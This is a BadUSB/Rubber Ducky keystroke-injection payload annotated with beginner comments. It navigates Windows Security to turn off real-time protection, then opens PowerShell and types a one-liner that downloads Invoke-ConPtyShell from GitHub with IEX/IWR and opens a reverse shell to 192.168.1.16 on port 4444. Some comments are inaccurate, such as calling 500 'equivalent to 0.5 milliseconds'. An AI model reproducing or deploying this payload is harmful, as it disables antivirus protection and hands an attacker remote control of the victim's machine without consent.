GUI(open the window search)
DELAY 500( delay time 500 is equivalent to 0.5 milliseconds)
STRING virus and threat(type in the search bar)
DELAY 500
ENTER(enter button like the keyboard)
DELAY 500
TAB(tab button in the keyboard)
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
SPACE(spacebar in the keyboard)
DELAY 500
LEFTARROW(left arrow key in the keyboard)
DELAY 500
ENTER
DELAY 500
ALT F4(alt+f4 in the keyboard)
DELAY 500
REM Enter Powershell and type in the script(The REM command is just a comment in the payload)
GUI R(run command dialog)
DELAY 500
STRING powershell(it will type the powershell in the input area)
DELAY 500
ENTER
DELAY 500
STRING IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 192.168.1.16 4444
DELAY 500
ENTER
DELAY 500
GUI down(to minimize the powershell)
DELAY 500
